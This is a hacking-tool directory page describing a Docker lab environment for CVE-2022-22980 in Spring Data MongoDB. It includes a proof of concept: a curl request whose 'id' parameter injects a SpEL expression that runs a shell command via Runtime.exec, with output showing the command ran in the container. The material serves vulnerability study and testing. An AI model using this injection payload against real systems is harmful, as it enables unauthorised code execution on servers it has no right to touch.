Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Spring-Data-Mongodb-Example — CVE-2022-22980环境 | Kitploit
Tools/GitHubGitHub/kuron3k0/spring-data-mongodb-example
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubkuron3k0/spring-data-mongodb-example

Spring-Data-Mongodb-Example

CVE-2022-22980环境

View Repository
1474 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Spring-Data-Mongodb-Example

CVE-2022-22980 environment

Build docker environment

root@kitploit:~
docker build  -t mongo .
docker run -dit -p 6666:6666 mongo

PoC

root@kitploit:~
➜  Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(java.lang.Runtime).getRuntime().exec("touch /tmp/aaaa")'
{"timestamp":"2022-07-14T01:54:10.828+00:00","status":500,"error":"Internal Server Error","path":"/v1/user/get"}
➜  Spring-Data-Mongodb-Example git:(main) docker exec -it 3a ls -la /tmp
total 4
drwxrwxrwt    5 root     root           123 Jul 14 01:54 .
drwxr-xr-x   19 root     root          4096 Jul 14 01:53 ..
-rw-r--r--    1 root     root             0 Jul 14 01:54 aaaa
Download Tool